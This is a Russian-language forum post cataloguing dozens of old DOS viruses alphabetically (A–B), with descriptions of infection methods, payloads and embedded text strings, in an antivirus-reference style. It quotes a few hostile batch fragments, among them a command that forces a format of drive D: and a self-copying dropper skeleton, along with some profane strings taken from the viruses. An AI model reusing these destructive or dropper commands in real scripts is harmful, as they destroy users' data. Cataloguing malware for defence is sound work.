-= NIBIRU =-

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » -= NIBIRU =- » Computer Protection - ЗАЩИТА КОМПЬЮТЕРА » Viruses - ВИРУСЫ


Viruses - ВИРУСЫ

Сообщений 1 страница 30 из 30

1

Вот решил описать вирусы известные мне на данный момент !
Все вирусы разбиты по алфавиту.

A

A1B2.478

Опасный замещающий вирус. По окончании своей работы вирус имитирует ошибку позиционирования на текущем диске и выводит сообщение:
Seek error reading drive
Abort, Retry, Ignore, Fail? При нажатии на клавишу 'A' вирус отдает управление DOS. Содержит в начале кода текстовую строку "A1B2C3D4", которая используется, как инструкции ассемблера. При не нахождении в текущем каталоге на флоппи- диске файлов *.COM вирус, видимо, хотел бы отформатировать нулевую дорожку данной дискеты, но в данном месте имеется ошибка, и форматирование не произойдет.

A&A

Неопасный резидентный вирус. С февраля по ноябрь каждый час переставляет соседние символы на экране.

Abs-3

Опасный Boot-вирус. Может уничтожить 7 первых секторов флоппи-диска.

Adolf.475

Опасный резидентный вирус. С вероятностью 1/8 блокирует удаление файлов. Содержит текст "Adolf Hitler".

Aforia.656

Неопасный резидентный вирус. После заражения каждого файла "осыпает" буквы на экране монитора, установив на это время в CMOS-памяти признак отсутствия жесткого диска.

Aga.1500

Неопасный нерезидентный шифрованный вирус. В пятницу вирус записывает в файл AUTOEXEC.BAT текст: ECHO Hey,suckers! Hold on,your data's gone too far! ECHO MONGOLIA,UB. В пятницу 13-го вирус выводит текст "WARNING! Today is the 13th !". Если вирус считает, что стартовал из инфицированного файла WIN.COM, то он выводит текст: WARNING!!! Your MS-Windows 3.1 you are working with is not licensed! In the light of it,we are entitled to aver that we will activate a protective application against your unauthorised access... А при старте зараженного файла DOOM.COM вирус выводит текст: DOOM! v1.0 Всъэы еЁ Децнецй хшцй Ёюъишм жетце! Содержит также текст "AGA Media©,94". При заражении файла COMMAND.COM из версии MS-DOS 5.0 вирус не увеличивает его длины, записываясь в область нулевых байт.

Agiplan.1536

Очень опасный резидентный вирус. В зависимости от текущей даты может уничтожить информацию на всех доступных дисках. Иногда может вывести сообщение "load error".

Aija

Очень опасный Boot-вирус. 25 марта уничтожает содержимое первого секто- ра на всех цилиндрах активного раздела DOS и выводит сообщение: FINNISH_SPRAYER.1. Send your Painting +358-0-4322019 (FAX), [Aija] Со- держит строку "Tks to B.B., Z-VirX ..... [Aija]".

Alex.368

Оставляет в памяти резидентную программу, посылающую значение FEh в порт 60h. Имеет текст "The One Night Virus © Alex Hacker".

Alex.1287

Неопасный нерезидентный вирус. 20 числа оставляет в таблице векторов прерываний резидентный код, который исполняет мелодию из фильма "Карьера Димы Горина". Имеет текстовую строку "AlEx".

Alfons.1344, 1536

Очень опасные резидентные вирусы. Если значение дня недели (понедельник - 1, вторник - 2,...) + 1 совпадает со значением числа месяца, то вирус уничтожает содержимое секторов диска, заполняя их текстом "Alfons !".

Alia.1023, 1200, 1300

Неопасные резидентные шифрованные вирусы. Содержат тексты "ALIA" или "~ALIA~".В коде вирусного расшифровщика используют команды сопроцессора - FINIT, FCHS, FTST, FNOP.

Alias.6943

Опасный резидентный полиморфный вирус. Использует вход в защищенный режим процессора и немедленный выход из него. Для чего - непонятно? Данный код был полностью скопирован из книги А. и Г. Фроловых "Защищенный режим процессоров Intel 80286/80386/80486", причем без понимания сущности данного кода. Вирус пытается определить тип процессора, и если процессор - 286 или ниже,выводит текст "Sorry, 80286 CPU or higher required . . .". Далее, если компьютер уже находится в защищенном режиме, то вирус выводит текст "Cannot run in the Protected or V8086 mode." и завершает работу программы. Перехватывает INT 8, 13h, 21h, 2Fh. С помощью INT 8 вирус контролирует целостность своего резидентного кода. При старте некоторых программ (DRWEB, AIDSTEST,...) вирус выводит текст "Bad command or file name".

Ambulance.796 (1,2), 2124

Неопасные нерезидентные (Ambulance.2124 - резидентный) вирусы. Иногда (Ambulance.2124 через 20 минут после неактивной клавиатуры и если не было обращений к дискам через INT 13h) рисуют двигающийся внизу экрана и издающий звуки сирены автомобиль скорой помощи:

Amd.3081

Опасный резидентный вирус. Рассылает по сети Novell сообщение "ОЙ ДОСТАЛ, ДОСТАЛ ...". Содержит текст "Name: Babylon5 Cast Of Warriors © TechnoMag". Из-за своих многочисленных ошибок разрушает большинство из заражаемых файлов.

Amd.4772

Hеопасный резидентный шифрованный вирус. Рассылает по сети Novell сообщение "ОЙ! ДОСТАЛИ ЛАМЕРЫ !!!". В пятницу записывает в MBR жесткого диска недоделанный загрузочный вирус, который "перехватывает" INT 13h, прячет свое наличие на диске, но только "забывает" заражать загрузочные сектора дисков. Вирус содержит тексты:
NAME: MPEI
Данилов ты ЧАЙHИК,ТАКОЙ ЖЕ КАК И БИЛЛИ ГАТЕС(ТЫ ПОЙМЕШЬ).
Тозмоза, вирус, которому дал имя AMD назывался не AMD ,
а Windows 95 MUST DIE !!!
а строчку Windows 95 MUST DIE !!! он слал в виде мессаги по сети.
Принеси свои извинения и ,кстати, напиши Upgrade для юзеров.
DRWEB очень хорошо разносит заразу по винту. Эффект на 1000%
И еще, лучше бы ты через DMA бластер программил !
Жду версий под Вынд0уz 59, вот там ты поработаешь через DMA.
Балбес, ты Лозинского без работы оставил !!!
Copyleft © Down'niloff Corp.,2000. All Lefts Preserved. Григорчук.

AMGorb.4670

Опасный резидентный шифрованный вирус. Периодически "трясет" экран. Вирус "перехватывает" INT 13h и при чтении секторов диска пытается найти строку "Micro", и при нахождении ее - изменяет данную строку на "*AMG*". Может вывести одно из следующих сообщений:
Heat level critical.Shutdown sequence initiated...
Dr.WEB-полный DUMB! если кто с нами согласен прошу :
PIDOR@LOXNET.XYZ мы всегда |*)
"Надежный" эвристический анализатор...
AMGorb.ver 2.6 for ALLwe HaTe w95!
ПОШЕЛ НА ФИГ
Так-так. Грозно входит Фома в кабинет.
Все кончено. Боже,спасения нет,
А с ним еще Рома, слепой офицер.
На ком остановится жуткий прицел ?
На мне.Елки-палки,хана мне друзья,
Приходит,похоже,кончина моя.
"Давай, поднимайся,в каморку пойдем,
И там потолкуем о жизни вдвоем"
-"Какой еще жизни,Я так не хочу !"
-"Молчи, не то живо башку откручу !!"
Ну нечего делать,придется идти,
А сердце так бешено скачет в груди.
Меня затолкнули,захлопнули дверь.
" Ну что,вирусолог,попляшешь теперь."
Мне страшно ужасно,все тело дрожит,
Ведь диск с AMGorb-ом в кармане лежит.
Фома на меня грозно смотрит в упор
И мне говорит:" Сядь-ка,есть разговор",
А я говорю:"Sir,я очень спешу,
Задайте вопросы,я их запишу,
Подробно отвечу,размножу ответы,
И вам занесу я их следущим летом.
"Дурачить нас вздумал",-Фома заорал,
И с гадостным видом отвертку достал.
Раздался спасительный писк офицера:
"Фома,соглашайся,гутарит он дело
Ну разве АМ он? Какой он АМ?
Ну ты посмотри,он испуган совсем".
"Молчать,-рявкнул Леха,-УБЬЮ,ПИДАРАС!"
И долго несчастного он за уши тряс...
Но я откровенно скажу вам,друзья:
АМ-кто угодно,но только не я.
Он-гад нехороший,он вирусы пишет,
А я-лишь стишки,что написаны выше.
Истории этой печалный финал:
Под глазом моим неприметный фингал.

AmkCvc.1024

Неопасный резидентный стелс-вирус-спутник. При заражении COM и EXE- файлов присваивает исходным файлам имена с расширениями AMK (для COM- файлов) и CVC (для EXE-файлов), создает файл с исходным именем файла и записывает в него вирусный код. В пятницу выводит на экран текст:
Hi ! I am the Crazy October and I will now live on your system.
Don`t worry ! Everything is under controll.
Now I must go to replicate, bye !

Amoeba.2367

Опасный резидентный полиморфный вирус. 1 ноября и 15 марта уничтожает содержимое секторов жесткого диска. Содержит тексты:
AMOEBA virus by the Hacker Twins ©я1991 This isяnothing, wait for the release of AMOEBA II- The universalяinfector, hidden to any eye but ours! Dedicated to the University of Malta- theяworst educationalяsystem in the universe,and the destroyer of 5X2 years ofяhuman life

Amse (1,2)

Amse (1) содержит строку "AMSESLIFVASRORIMESAEP". Amse (2) - "ALFREDO". Amse (2) иногда выводит на принтер следующий текст "ANGEL X TE SALUDA © Laboratorio Luz de Luna LIMA - PERU".

Amz.789, 1100

Опасные нерезидентные вирусы. Amz.789 24 сентября, а Amz.1100 1 марта и 13 сентября пытаются уничтожить некоторые сектора всех доступных дисков. Amz.1100 также иногда уничтожает содержимое CMOS-памяти и создает файл BOPS-BOP.S. Содержат строку "AMZ".

Anarchy.2048 (1-3)

Опасные вирусы. Модификации вируса незначительно отличаются друг от друга. Заражают EXE- и COM-файлы (COM-файлы первая команда которых не JMP NEAR PTR (0E9h ? ?)), внедряя в начало файла 2048 байт своего тела в формате EXE-файла. 2048 байт файла-жертвы вирусы переносят в свободный кластер, не увеличивая при этом длины пораженного файла. Т.е., длина файла по цепочке FAT может не совпадать с реальной длиной. COM-файлы, имеющие первой командой инструкцию JMP NEAR PTR, и содержащие 2003 повторяющихся байта, вирусы поражают другим методом. Они переносят 2003 байта из адреса первого перехода в область повторяющихся байт, и в освободившееся место записывает 2003 байта собственного кода. Содержат ошибки, в результате которых могут разрушить FAT и сделать неработоспособными COM-файлы. Перемещенные на другой диск программы также могут быть неработоспособными. Внедряют команды перехода на свой обработчик прерывания в оригинальный обработчик DOS INT 21h. Содержат текстовые строки: "ГрОб", "ANARCHY" и зашифрованную строку "Янъ Факовскiй,USSR,1994" или "Янъ Факовскiй,USSR'94".

Anarchy.3153

Опасный резидентный полиморфный стелс-вирус. 8 и 30 апреля, а также 9 мая вирус уничтожает содержимое случайных секторов первого жесткого диска. Содержит тексты:
Озаглавилась весна топором,
Успокоилась река декабрем,
Утро одиноким выстрелом
JANKA DYAGILEVA
JAN FAKOVSKIJ,USSR,1997

Anarchy.5838, 6093

Опасные резидентные полиморфные стелс-вирусы. Вирусы заражают COM, EXE файлы, а также DOC-файлы для WinWord версий 6.0-7.0. При открытии DOC- файлов (через f.3dh Int 21h) вирус анализирует внутренний формат OLE2 документа, создает новую таблицу макросов и дописывает в конец данного документа зашифрованный макрос AUTOOPEN, содержащий вирусный код дроппера. При открытии такого инфицированного документа с помощью WinWord, вирусный макрос создает на диске EXE-файл в формате Win NewExe (NE), записывает в него код вируса, запускает его, и по окончании его работы - удаляет. Данный NewExe-файл производит заражение командного процессора (COMMAND.COM) и программы WIN.COM. Что интересно, если вирус был активен в памяти до загрузки Windows или Windows'95,то при открытии любого документа средствами Word for Windows, данный документ окажется инфицированным. При заражении DOC-файла вирус использует некоторые "дыры" в формате OLE2, в результате чего при активном вирусном макросе AUTOOPEN просмотреть его *наличие* в системе средствами WinWord [TOOLS/ MACRO] не предоставляется возможным. Вирус является стелс-вирусом (невидимкой) не только для среды DOS, но и для среды WinWord. Вирус содержит некоторые ошибки в процедуре заражения OLE2 DOC-файлов. В результате чего некоторые файлы небольшие DOC-файлы могут быть разрушены при заражении, а также будут разрушены все DOC-файлы для MS- Office'97. Данный вирус является первым известным многоплатформенным вирусом, который заражает файлы таких различных операционных сред, как DOS, Windows и MS Word for Windows (если считать, что WinWord является также операционной средой). 8 и 30 апреля, а также 9 мая вирус уничтожает содержимое случайных секторов первого жесткого диска. Содержат тексты:
Озаглавилась весна топором,
Успокоилась река декабрем,
Утро одиноким выстрелом
JANKA DYAGILEVAradise При запуске программы NCEDIT.EXE, с именем редактируемого файла в командной строке, вирус может "включить" свой собственный редактор для редактирования данного файла. Верхняя строка вирусного редактора имеет текст "Up with your shit, square sods!". Также может вывести непечатное английское слово и "завесить" систему. Содержит также тексты "JAN FAKOVSKIJ,USSR,1995", "UNFORGIVON".

Andromeda.758

Опасный резидентный вирус. 5 октября пытается уничтожить содержимое 13 первых секторов диска A:. При заражении использует функции FCB. Имеет текстовую строку "[ANDROMEDA V1.1] BUDAPEST HUNGARY".

Angel.661, 1571

Резидентные вирусы. Angel.1571 - шифрованный стелс-вирус. Angel.661 устанавливает свою резидентную копию в область UMB. Angel.661 при вызове функции проверки версии DOS (f.30h Int 21h) пытается исправить в памяти какую-то программу, вызвавшую данную функцию. Angel.661 имеет строку "Angel".

Animality.1974

Опасный резидентный вирус. После марта месяца 10, 20 и 30 числа вирус собирался уничтожать информацию на 33-ех секторах первого жесткого диска, записывая в первый уничтожаемый сектор текст "ANIMALITY virus , © 1998 ,Ukraine .Весело було ,як батька ховали :музика грала ,цукерки давали ...". Но из-за ошибок в коде вируса уничтожения информации не будет. Для того, чтобы "весело було" надо было испытать деструктивный код на своем компьютере. Вирус не работоспособен на процессорах Pentium.

Anthrax

Опасный файлово-загрузочный вирус. Не сохраняет оригинальный MBR жесткого диска. Содержит тексты "© Damage, Inc.", "ANTHRAX".

AntiC.1000

Опасный нерезидентный вирус. Заражает *.COM и *.EXE-файлы, причем EXE- файлы делает неработоспособными - заражает также, как и COM. Если находит в памяти "на INT 13h" монитор VSAFE, то выводит текст "И даже VSafe тебе не поможет...", после чего отдает управление программе- вирусоносителю. Удаляет файлы *.MS, *.C, *.H. Если вирусу удается удалить 4 и более таких файлов, то он выводит текст "Ты на С не пиши!!! Это фигня!!! Я вот пишу на Paskalе!!!". Также выводит строку "Слушай..." и исполняет мелодию.

AntiCMOS (1-3)

Очень опасные Boot-вирусы. Не сохраняют оригинальные MBR и Boot-сектора дискет при заражении. При загрузке системы с таких инфицированных секторов, вирусы самостоятельно читают активный Boot-сектор для жестких дисков или системный файл IO.SYS (либо ему подобный) для флоппи-дисков в память и отдают им управление. AntiCMOS (1) портит CMOS-память. Существует модификация вируса AntiCMOS (2), которая вместо порчи CMOS- памяти воспроизводит некоторый "рычащий" звук и содержащая текст "I am Li Xibin!".

AntiFortran.1110

Опасный резидентный вирус. Удаляет программы, стартующие из каталога F77. В понедельник записывает в конец файла C:\AUTOEXEC.BAT строку @ECHO Y | FORMAT D:. Во вторник замедляет работу процессора. Содержит текст "ANTI FORTRAN OF OVER-X".

AntiPascal.400, 605

Очень опасные нерезидентные вирусы. AntiPascal.400 удаляет файлы ?????????A?. AntiPascal.605 записывает в начало *.PAS и *.BAK-файлов свой код, не сохраняя их оригинальные байты.

AntiTrace.2122

Неопасный резидентный вирус. При открытии инфицированных файлов, если нажаты обе клавиши Shift, то вирус удаляет свой код из данных файлов. Содержит тексты "Anti_Trace", "Good Luck in Creating Antivirus. © 1993, AT Corp.".

Antiwin.465

Опасный нерезидентный вирус. Производит поиск *.COM-файлов в текущем каталоге и заражает их. Вирус разрушает файлы с именем WIN* (WIN.COM), записывая в их начало процедуру вывода на экран сообщения и завершения работы "This program requires Microsoft Windows". Содержит текст "->AntiWindows<-".

Antiwin.633

Опасный резидентный вирус. Удаляет стартующую программу, если ее первые байты равны (EBh 51h). Видимо, это касается файла WIN.COM. Содержит тексты "Anti-Win 1.0", "© Zarathustra & Morgan".

Antiwin.2305, 2320

Опасные резидентные шифрованные вирусы. При вводе с клавиатуры довольно часто повторяют ввод клавиши "t". При загрузке MS-Windows могут вывести текст "Use registered copies of MS Windows Greetings from MrStrange, Kiev T.G.Shevchenko University". Содержат строку ">Antiwin<, © by MrStrange.". Не заражают файлы,начинающиеся на DRWE,AIDS,MSCA,ANTI,AVP, WEB,SCAN,MSAV,VSAF,GUAR,ADIN,KRNL,DOSX,WSWA,DSWA,WIN3.

Apparition.254,700

Неопасные резидентные вирусы. Устанавливают свою TSR-копию в область видеопамяти по адресу BA00:0000 и перехватывают INT 21h. Apparition.700 также перехватывает INT 10h и не позволяет изменить текущий видеорежим монитора (f.00h INT 10h) для того, чтобы не быть уничтоженным в видеопамяти. Apparition.700 содержит текст "THE APPARITION".

Apparition.5959

Опасный резидентный шифрованный вирус. Может уничтожить содержимое CMOS-памяти, перегрузить или "завесить" систему. "Перехватывает" INT 9, 10h, 13h, 1Ch, 21h, 2Fh. При старте инфицированного файла выводит текст "Warning : This file is infected by Apparition !". Также иногда может вывести текст "386 or later processor missing. Please replace processor, then press any key...".

AreThree.2048 (1-3)

Неопасные резидентные шифрованные файлово-загрузочные вирусы. Могут вывести красную точку в верхнем правом углу экрана. Содержат текст:
PSYCHo-TECH GMBH 1995
>>> BRAVEd DANGER 4 BRAVE PEOPLe <<<
[[ Cъ0ъDъEъWъAъR ]]
<31> Germany 1995
Virtually called to life & survival by MiNDMANiAC!
RGOEPMSQO ==>= AllE GUtEN DiNGE SiND DREi ==>=

ArjDrop.402

Неопасный нерезидентный вирус-червь. Ищет ARJ-архивы и заражает их, дописывая к ним свою вирусную копию, которая имеет имя RUNME.COM Вирус содержит текст "ARJDrop by Qark/VLAD".

ArjDrop.2821

Hеопасный нерезидентный вирус-червь. Производит поиск ARJ и RAR-архивов и заражает их, дописывая к данным архивам собственную копию в форматах этих архивных файлов. В ARJ-архивы вирус записывает файл RUNME.COM, содержащий вирусный код, а в RAR-архивы - файл RUN_ME_.COM. В августе вирус создает файл PRESENT.COM и записывает в него код. Вирус также содержит строки "RAR'n'ARJ Dropper by Qark/VLAD.", "RAR support included by Blesk".

ArjVirus

Неопасный нерезидентный вирус. Производит поиск файлов с расширением ARJ в текущем и во вложенных директориях. Обычно расширение ARJ имеют архивные файлы, созданные с помощью популярного архиватора ARJ. При нахождении таких файлов, вирус создает файл со случайным именем, состоящим из 4 букв от 'A' до 'V' и с расширением COM. В данный COM- файл вирус записывает 5000 байт своего кода + случайное количество байт. После чего, вирус считая, что архиватор ARJ.EXE находится в каталоге, доступном через переменную PATH, вызывает его с помощью командного процессора c:\command.com /c arj a , где ArjFile - это найденный вирусом файл с расширением ARJ; ComFile - COM-файл, содержащий вирусный код; опция же "a" говорит архиватору о том, что необходимо включить зараженный файл ComFile в архивный файл ArjFile. После указанных манипуляций вирус уничтожает созданный COM-файл. Следует отметить, что во время заражения архива вирус устанавливает INT 10h (вывод на экран) на собственный обработчик, состоящий из одной команды - IRET, для того, чтобы при возникновении ошибки или по другим причинам не происходило вывода текста на экран. Т.о., "расчет вируса" сводится к тому, что пользователь, распаковавший ARJ-архив и увидевший неизвестный COM-файл, обязательно запустит его ради интереса... Так сказать - "психологический вирус".

Armagedon.1079

Неопасный резидентный вирус. С 5.00 до 6.00 вирус активно работает с последовательными портами, видимо, пытаясь дозвониться до какого-то номера с помощью модема. Содержит строку "Armagedon the GREEK".

Artemiev.2165

Неопасный резидентный шифрованный вирус. Иногда производит "дрожание" экрана. Содержит тексты "Игорь", "Artemiev I.A.".

Ash.712, 737

Неопасные нерезидентные вирусы. Заражают COM-файлы, записываясь в их конец. Переименовывают файл C:COMMAND.COM в C:\COMMANDx.COM, где 'x' - это символ с кодом 255 (0FFh) и создают новый файл C:\COMMAND.COM, состоящий из 8 команд NOP, который сразу же и заражают. Вирусы могут выводить сообщение "Bad command or file name". Также могут оставить в памяти резидентную программу на INT 08, которая посылает в порты 2E8h, 2F8h, 3E8h, 3F8h (COM1, COM2, LPT1, LPT2) символ 0DBh 'Ы'.

Asprin.2515

Неопасный нерезидентный вирус. Заражает COM и EXE-файлы, причем EXE- файлы превращает в COM, изменив первые 3 байта на команду перехода. При старте вирус удаляет свой код из стартовавшей программы, запускает ее на выполнение, после чего производит поиск и заражение файлов на диске. По окончании работы вирус оставляет в памяти резидентный код на INT 08, производящий холостые циклы и замедляя скорость работы компьютера. Содержит текстовые строки "VIRUS "ASPRIN" ГЛАЗОВ 1995©ПРИВЕТ ВСЕМ ХАКЕРАМ г.ГЛАЗОВА! ПРИ ЗАПУСКЕ EXE ФАЙЛА,VIRUS СНАЧАЛА ЛЕЧИТ ЕГО! ИСПОЛЬЗУЙТЕ ЭТО СВОЙСТВО ДЛЯ ЛЕЧЕНИЯ! ЖЕЛАЮ УСПЕХОВ В ИЗУЧЕНИИ КОМПЬЮТЕРНОЙ МИКРОБИОЛОГИИ!", "/QHELP", "MsDos".

Avatar.Dichotomy

Опасный резидентный вирус. Состоит из двух частей 296 байт и 567 байт. Перехватывает INT 21h. Корректно заражает только COM-файлы. При запуске EXE-файлов портит их. Вирус делит запускаемые программы на "четную" и "нечетную" половину. При старте "нечетного" файла вирус дописывает к нему 567 байт своего кода. При старте же "четного" файла вирус заражает его, дописывая в его конец 296 байт и изменяя 3 первых байта на команду перехода на вирусный код. В дальнейшем при старте инфицированного "четного" файла, вирус ищет свою вторую половину в "нечетном" файле, имя которого вирусом сохраняется. Если "нечетная" файл найден, то вирус считывает свою вторую половину и остается в памяти резидентно. Если же не найдена - вирус отдает управление программе-вирусоносителю. Т.о., данный вирус является "работоспособным" если в системе находятся обе части вируса. Содержит строки: "[Dichotomy] © 1994 Evil Avatar", "[Dichotomy]".

Avatar.Narcosis

Опасный файлово-загрузочный вирус. 9 июня уничтожает содержимое первого жесткого диска.

Avatar.Positron

Неопасный резидентный вирус. "Перехватывает" INT 21h, контролирует запуск COM-файла, после чего ждет первого вызова INT 21h и внедряет вместо этого вызова в стартовавший файл JUMP NEAR (E9 ?? ??) на свой код, который вирус записывает в конец файла. Awake.797 содержит текст "Ирина Ивановна Крупянко - Дура, Коза и ......... Школа N434".

AWME - вирусы

AWME (Anti WEB Mutation Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Явный плагиат из вируса Natas. Создан, якобы, для обмана эвристического анализатора антивирусной программы Dr. Web казанским человеком под именем Амир aka AD. Содержит строку "\> Anti WEB Mutation Engine [AWME] by AD. v1.0

AWME.AD.1267

Неопасный нерезидентный вирус. Не заражает файлы, содержащие первые 2 буквы из текстовой строки "AIWESCCOVSADAN-V". Содержит текстовую строку "This is a simple [AWME] demo virus by AD.".

Azusa (1,2)

Опасные загрузочные вирусы. Оригинальный MBR жесткого диска не сохраняют, а boot-сектор дискет сохраняют в 8 секторе 40 дорожки, что может приводить к потере информации в данном секторе на дискетах отличных от формата 360 Kb. Иногда блокируют работу с COM и LPT- портами.

Отредактировано GRANDDUKE (2006-02-17 14:25:53)

0

2

B

Baby.83, 100

Неопасные резидентные вирусы-спутники. Изменяют последнюю букву расширений запускаемых файлов.

BackFormat.2000 (1,2), 2345, 2381

Опасные вирусы. Заражают EXE, COM-файлы на дисках A: и B: при закрытии (f.3Eh INT 21h) вновь создаваемых файлов (f.3Ch, 5Bh INT 21h). BackFormat.2000 (2) также заражает при закрытии открытых файлов. Вирусы заражают c:\command.com, не изменяя его длины. Перехватывают INT 13h, INT 21h. При форматировании гибких дисков, последовательно присваивают секторам значения в обратном порядке, начиная со старших адресов. Например, для диска 360K вместо значений 1,2,...,9, порядок чередования секторов будет - 9,8,...1.

BackFormat.2320

Очень опасный резидентный шифрованный вирус. При записи в файл (f.40h Int 21h) очень часто сдвигает записываемую информацию на 1 байт. В пятницу производит данную операции в 4 раза чаще.

BackUSSR

7 октября выводит текст "I'm backing to the USSR !".

BadBoy.1000 (1-7)

Неопасные резидентные вирусы. Состоят из 9 блоков, 8 из которых вирусы меняют местами при инфицировании файлов.

Badless.494

Опасный нерезидентный вирус. Заражает *.COM-файлы. Файлы формата EXE, имеющие расширение COM вирус уничтожает, записывая в них 37 байт кода, который при старте данных программ выводит текст "Only in God we trust...". Имеет также текст "Badless 1992".

BadSectors.3422, 3428, 3627

Опасные резидентные вирусы. Перехватывают INT 8, 16h, 21h, 25h, 26h. Иногда устанавливают "плохие" кластеры диска посредством манипуляций с таблицами размещения файлов FAT. Не заражают программу SCAN. Содержат текстовые строки "COMEXE", "SCAN" и
BadSectors.3422: BadSectors 1.1
BadSectors.3428: BadSectors 1.2
BadSectors.3627: BadSectors 1.3

Balashiha.271

Блокирует вывод на принтер. Содержит строку "Balashiha-2".

BAME-вирусы

BAME (Black Angel Mutatuon Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан вирусописателем известным, как Black Angel.

BAME.Demo

Неопасный резидентный полиморфный вирус. Каждую минуту "сбивает" буфер клавиатуры. Содержит тексты "This is [BAME beta version] DemoVirus © Black Angel`96", "BlackAngelMutationEngine v1.beta ©Black Angel".

BAME.Saboteur

Опасный резидентный полиморфный вирус. Разрушает каждый 15 открываемый файл с расширением BA?, AR?, PA?, записывая в них строку "SABOTEUR-2". После заражения 6 программ (а также в некоторых других случаях) вирус уничтожает содержимое CMOS-памяти, MBR первого жесткого диска.

Bandersnatch

Неопасный резидентный полиморфный стелс-вирус. Содержит тексты "Злопастный Брандашмыг", "DOS-UP", "What's fuck?"

Baran.3294, 4968

Резидентные полиморфные вирусы. Baran.4968 - стелс-вирус. Baran.4968 заражает командный процессор, указанный в переменной COMSPEC. Если вирус работает под управлением MS Windows, то вирус также заражает программу, которая запускается при выходе из Windows. Baran.3294 может вывести текст "Gwadera to baran !". Baran.4968 портит данные, записываемые на диск. Baran.4968 содержит текст "Unknown destroyer v1".

Barrotes.1303

Неопасный резидентный шифрованный вирус. Сразу стремится заразить файл COMMAND.COM. 23 сентября изменяет символы, вводимые с клавиатуры. Содержит тексты "Sta Tecla (MAD1)", "ST".

Barrotes.1310

Опасный резидентный вирус. Первым делом стремится заразить файл c:\command.com. 5 января уничтожает MBR первого жесткого диска и выводит на экран текст "Virus BARROTES por OSoft".

Basilisk.1639

Неопасный полиморфный вирус. При старте программ SCAN*.* вирус выводит сообщение "Packed file is corrupt" и возвращает управление в DOS. Содержит строку "Basilisk v1.0" и текст:
© 1992 YAM/RABID International
The slave thinks he is released from bondage
only to find a stronger set of chains

Bastard.1979

Очень опасный резидентный вирус. Заражает EXE-файлы и файл COMMAND.COM. В файл COMMAND.COM вирус записывает 200 байт кода, который не является вирусным кодом. Может уничтожить 100 секторов диска A: или C: Удаляет файлы MS*.* и CP*.*. Не заражает файлы, содержащие в своем имени 2 соседние буквы из строки "SCCLF-TBVSVIIMMSCV". Имеет строку "This virus was written by Doctor Revenge November 23 - December 29 1993 -Italy-".

BAT.282

Неопасный нерезидентный Batch-вирус. Создает в корневых каталогах дисков B: и C: файл VIRUS.BAT, содержащий вирусный код. Вставляет в файл AUTOEXEC.BAT вызов файла VIRUS.BAT.

BAT.Batalia.2011

Неопасный полиморфный вирус, заражающий *.BAT-файлы в текущем каталоге. При заражении файлов вирус использует архиватор ARJ, доступный через переменную среды PATH. Инфицированный BAT-файл состоит из двух частей. Первая часть состоит из пяти команд DOS, а вторая часть является заархивированным с помощью ARJ BAT-файла, имеющего случайное имя. Этот заархивированный BAT-файл также содержит команды DOS и еще один ARJ - архив. Команды DOS являются основным телом вируса, они производят поиск файла-жертвы, заражение файлов и создание полиморфного кода.Первые пять команд вируса вибираются случайным образом и имеют различную длину. Вторая часть - ARJ-архив зашифрован со случайным паролем и не может быть детектирован по определенной маске. При запуске инфицированного BAT-файла, первые пять команд запускают архиватор ARJ для распаковки второго BAT-файла и передают ему управление. Этот BAT-файл создает временный подкаталог S_G_W_W, разархивирует в этот подкаталог файлы из второго архива, выполняет поиск и заражение BAT-файлов, выполняет BAT-файл-носитель, удаляет временный подкаталог и файлы и заканчивает свою работу.

BAT.Batman

Неопасный резидентный вирус, заражающий BAT-файлы. Инфицированный BAT- файл создает файл B.COM, в который записывает свой код, и отдает ему управление. Файл B.COM, исполняющий содержимое BAT-файла, как машинные инструкции устанавливает в память свою резидентную копию, не проверяя ее наличия в памяти, и "перехватывает" INT 21h. После этого файл B.COM удаляется. При записи в файл (f.40h Int 21h) вирус проверяет не находится ли первой в буфере записи строка @echo. Если находится, то вирус считает, что производится запись BAT-файла и записывает в него свой код. Внешне вирус BAT.Batman выглядит следующим образом:
@ECHO OFF
REM [............]
copy %0 b.com>nul
b.com
del b.com
rem [............]
В квадратных скобках [......] схематично показано расположение байт, которые являются ассемблерными инструкциями или данными вируса.

BAT.BatVir

Неопасный нерезидентный вирус, заражающий BAT-файлы. Инфицированный BAT-файл создает файл BATVIR.94, в который записывает собственный дамп. Далее с помощью программы DEBUG данный дамп преобразуется в COM-файл. Данному COM-файлу программой DEBUG отдается управление. Этот COM-файл производит поиск и заражение *.BAT-файлов в текущем каталоге, после чего производится выход из DEBUG и удаление файла BATVIR.94. Вирус содержит текст "rem [BATVIR] '94 © Stormbringer [P/S]".

BAT.Highjaq

Очень опасный нерезидентный вирус-червь. Записывает свой код в WINSTART.BAT, ARJ-архивы и создаваемый вирусом системный драйвер. При старте инфицированного WINSTART.BAT-файла вирус создает файл C:\Q.COM, записывает в него свой код и запускает его следующей строкой BAT-файла: dir \*.arj/s/b|c:\q.com/i. Команда DIR производит поиск всех *.ARJ-файлов и передает их имена вирусному файлу C:\Q.COM.Данные архивы заражаются путем приписывания к ним еще одного поля в формате ARJ-архива, содержащего неупакованный (store) инфицированный файл /WINSTART.BAT (данный файл, расположенный в корневом директории диска, где находится система MS-Windows будет автоматически запускаться при старте MS-Windows).После чего вирус (C:\Q.COM) проверяет установлена ли его резидентная копия в памяти.Если нет, то вирус (С:\Q.COM) возвращает соответствующий код возврата (errorlevel) и заканчивает свою работу. По данному коду возврата (если память не инфицирована) вирус в BAT- файле переименовывает файл C:\Q.COM в C:\ABCDEFGH.IJK (вирус генерирует случайное имя) и дописывает в конец файла C:\CONFIG.SYS строку "INSTALLHIGH=C:\ABCDEFGH.IJK". Данный вирусный системный драйвер будет устанавливать резидентную копию вируса в память при загрузке DOS. Резидентная копия "перехватывает" INT 8, 21h и не занимается заражением файлов, а предназначена для идентификации наличия вируса в системе, а также вирусный обработчик INT 21h блокирует функцию GetFileAttribute для файлов, имена которых начинаются на "/W". Вирусный обработчик INT 8 через некоторое время перезагружает систему, если компьютер работает не под управлением MS-Windows. Вирус контролирует COM-порты и иногда посылает в порт модема строки (? - номер порта):
